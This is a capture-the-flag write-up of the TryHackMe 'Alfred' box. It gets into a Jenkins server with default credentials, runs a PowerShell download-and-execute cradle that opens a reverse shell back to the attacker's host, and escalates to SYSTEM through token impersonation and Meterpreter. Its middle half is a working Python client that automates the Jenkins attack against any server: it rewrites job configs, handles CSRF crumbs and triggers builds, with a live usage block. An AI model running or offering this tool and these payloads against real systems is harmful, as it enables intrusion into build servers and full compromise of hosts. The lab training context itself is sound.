CTF-Writeups/TryHackMe/Alfred.md
2021-05-08 06:13:02 +05:00


TryHackMe-Alfred

Rustscan

```text
PORT     STATE SERVICE    REASON          VERSION
80/tcp   open  http       syn-ack ttl 127 Microsoft IIS httpd 7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  tcpwrapped syn-ack ttl 127
8080/tcp open  http       syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

PORT 80 (HTTP)

Here we don't see anything interesting, so let's move on to the other HTTP port.

PORT 8080 (HTTP)

We can see a Jenkins login portal (Jetty is the servlet container Jenkins ships with), so let's try the default credentials:

admin:password

That didn't work, so let's try admin:admin

This worked and we are in. Now we need to find where we can execute commands so we can get a reverse shell on the target machine.

Hover over the project and you'll get a dropdown menu.

You'll have options like "Changes", "Workspace", "Build Now", "Delete Project", "Configure" and "Rename". Select `Configure`.

Scroll down to the Build section of the Configure page.

Here you can see an "Execute Windows batch command" build step that already runs the command `whoami`. Click Apply and then Save.

Click on build #2 and then Console Output.

You can see that whatever command we put in that build step, its output is shown here. Since the step is a Windows batch command, anything we want to run in PowerShell has to be prefixed with `powershell`. So we can host a PowerShell reverse-shell script (Nishang's Invoke-PowerShellTcp.ps1), download it with PowerShell straight into memory, and call the function it defines to get a shell:

```powershell
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
```

Start a python3 HTTP server in the directory that holds Invoke-PowerShellTcp.ps1.

Paste the command above into the batch build step with your IP and ports filled in, save, and start a netcat listener on the port you gave to `-Port`.

Now click on Build Now. The job will run the command and you'll get a shell on the listener.

Generate a msfvenom payload with encoders to bypass AV. (Encoders are mainly for avoiding bad characters and rarely defeat current AV on their own; it is enough for this lab box.)

Host it on your local machine and download it the same way, through the Jenkins build step.

Set up your Metasploit listener.

Execute the payload and you'll get a Meterpreter session.
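The two Jenkins steps above (changing the batch command to the Invoke-PowerShellTcp cradle, and later reusing it to drop the msfvenom executable) are just edits to the job's `config.xml` followed by "Build Now". The script below is an added example, not part of the original writeup, that does the same thing through the Jenkins REST API with only the Python standard library. It assumes the job is named `project` (the writeup never names it), the `admin:admin` credentials found above, the attacker IP `10.0.0.5` with the HTTP server on 8000 and the listener on 4444, and a payload file called `shell.exe`; the constructed `SAMPLE_CONFIG` mirrors the job state the writeup finds (one batch step running `whoami`). Jenkins installations with CSRF protection enabled require a crumb on POSTs, which the client fetches from the real `/crumbIssuer/api/json` endpoint.

```python
import base64
import json
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

# Constructed sample of a freestyle job's config.xml (not fetched from the box):
# one "Execute Windows batch command" step, which Jenkins stores as hudson.tasks.BatchFile.
SAMPLE_CONFIG = """<project>
  <description></description>
  <builders>
    <hudson.tasks.BatchFile>
      <command>whoami</command>
    </hudson.tasks.BatchFile>
  </builders>
</project>"""


def build_cradle(attacker_ip: str, attacker_port: int, http_port: int = 8000,
                 script: str = "Invoke-PowerShellTcp.ps1") -> str:
    """The writeup's in-memory download-and-execute one-liner with placeholders filled in."""
    url = f"http://{attacker_ip}:{http_port}/{script}"
    return (f"powershell iex (New-Object Net.WebClient).DownloadString('{url}');"
            f"Invoke-PowerShellTcp -Reverse -IPAddress {attacker_ip} -Port {attacker_port}")


def build_drop_and_run(attacker_ip: str, http_port: int = 8000, payload: str = "shell.exe",
                       dest: str = r"C:\Windows\Temp\shell.exe") -> str:
    """Variant for the msfvenom step: write the executable to disk, then start it."""
    url = f"http://{attacker_ip}:{http_port}/{payload}"
    return (f"powershell (New-Object Net.WebClient).DownloadFile('{url}','{dest}');"
            f"Start-Process '{dest}'")


def batch_commands(config_xml) -> list:
    """Commands of every hudson.tasks.BatchFile build step, in order."""
    root = ET.fromstring(config_xml)
    return [c.text or "" for c in root.iterfind("builders/hudson.tasks.BatchFile/command")]


def inject_batch_command(config_xml, command: str) -> str:
    """Return config.xml with the first batch step's command replaced (what editing the
    step under Configure and clicking Save does). A job without a batch step gets one."""
    root = ET.fromstring(config_xml)
    builders = root.find("builders")
    if builders is None:
        builders = ET.SubElement(root, "builders")
    step = builders.find("hudson.tasks.BatchFile")
    if step is None:
        step = ET.SubElement(builders, "hudson.tasks.BatchFile")
    cmd = step.find("command")
    if cmd is None:
        cmd = ET.SubElement(step, "command")
    cmd.text = command
    return ET.tostring(root, encoding="unicode")


class JenkinsJob:
    """Minimal Jenkins REST client: read/write a job's config.xml and trigger builds.
    Basic auth with the password; the crumb (tied to the session cookie) covers CSRF."""

    def __init__(self, base_url: str, job: str, user: str, password: str):
        self.base = base_url.rstrip("/")
        self.job = job
        self.auth = "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()
        self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())

    def _request(self, path: str, data: bytes = None, headers: dict = None) -> str:
        hdrs = {"Authorization": self.auth, **(headers or {})}
        req = urllib.request.Request(self.base + path, data=data, headers=hdrs,
                                     method="POST" if data is not None else "GET")
        with self.opener.open(req, timeout=20) as resp:
            return resp.read().decode(errors="replace")

    def _crumb(self) -> dict:
        try:
            issued = json.loads(self._request("/crumbIssuer/api/json"))
            return {issued["crumbRequestField"]: issued["crumb"]}
        except urllib.error.HTTPError as err:
            if err.code == 404:  # CSRF protection disabled: no crumb needed
                return {}
            raise

    def get_config(self) -> str:
        return self._request(f"/job/{self.job}/config.xml")

    def set_config(self, config_xml: str) -> None:
        self._request(f"/job/{self.job}/config.xml", data=config_xml.encode(),
                      headers={"Content-Type": "application/xml", **self._crumb()})

    def build(self) -> None:
        # Same as clicking "Build Now"; Jenkins answers 201 with an empty body.
        self._request(f"/job/{self.job}/build", data=b"", headers=self._crumb())

    def console(self, build: str = "lastBuild") -> str:
        # Equivalent of the Console Output page; poll until the new build has run.
        return self._request(f"/job/{self.job}/{build}/consoleText")


if __name__ == "__main__":
    # Live usage (placeholder target/job); python3 -m http.server 8000 and
    # nc -lvnp 4444 must already be running on the attacker machine.
    job = JenkinsJob("http://10.10.10.10:8080", "project", "admin", "admin")
    job.set_config(inject_batch_command(job.get_config(), build_cradle("10.0.0.5", 4444)))
    job.build()  # the shell lands on the netcat listener, not in the console output
```

Swap `build_cradle(...)` for `build_drop_and_run(...)` to stage the msfvenom executable the same way; note that anyone who can reach the Configure page of a job can do exactly this, which is why Jenkins job configuration rights are equivalent to code execution on the build agent.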

Running the command getprivs shows what privileges our process has on the machine.

Here we can escalate our privileges through SeImpersonatePrivilege, which lets the process impersonate the token of another user.

Run the command load incognito; this module lists and impersonates the tokens available on the host.

Even after impersonating a SYSTEM token we still won't be able to access system files, because Windows performs those access checks against the primary token of the process rather than the impersonated (thread) token. So we need to migrate to a process that already runs as SYSTEM, such as services.exe.